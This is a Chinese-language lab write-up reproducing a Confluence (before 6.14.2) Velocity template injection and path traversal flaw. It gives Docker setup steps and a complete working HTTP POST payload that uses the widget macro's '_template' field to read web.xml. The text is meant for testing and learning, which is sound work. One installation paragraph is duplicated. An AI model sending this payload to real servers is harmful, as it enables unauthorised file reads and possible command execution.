漏洞描述

Confluence 是由澳大利亚软件公司 Atlassian 开发的基于 Web 的企业 wiki。

Atlassian Confluence 6.14.2 版本之前存在一个未经授权的目录遍历漏洞，攻击者可以使用 Velocity 模板注入读取任意文件或执行任意命令。

漏洞环境及漏洞利用

启动docker环境

环境启动后，访问，您将看到安装指南，选择“试用安装”，然后系统会要求您填写许可证密钥。您应该向 Atlassian 申请 Confluence Server 测试证书：http://your-ip:8090

然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长（建议使用4G以上内存的机器进行安装测试），请耐心等待。

如果系统提示填写群集节点，则可以用 填充路径。/home/confluence

然后只需单击“下一步”即可安装。小内存VPS这一步可能无法安装或耗时较长（建议使用4G以上内存的机器进行安装测试），请耐心等待。

如果系统提示填写群集节点，则可以用 填充路径。/home/confluence

如此配置即可，账号密码都为postgres

 

完成所有配置看到以下画面

burp发送payload即可验证漏洞

POST /rest/tinymce/1/macro/preview HTTP/1.1
Host: localhost:8090
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
Connection: close
Referer: http://localhost:8090/pages/resumedraft.action?draftId=786457&draftShareId=056b55bc-fc4a-487b-b1e1-8f673f280c23&
Content-Type: application/json; charset=utf-8
Content-Length: 177

{"contentId": "786458", "macro":{"name": "widget", "body":"", "params":{"url": "https://www.viddler.com/v/23464dc6", "width": "1000"," height": "1000","_template":"./web.xml"}}}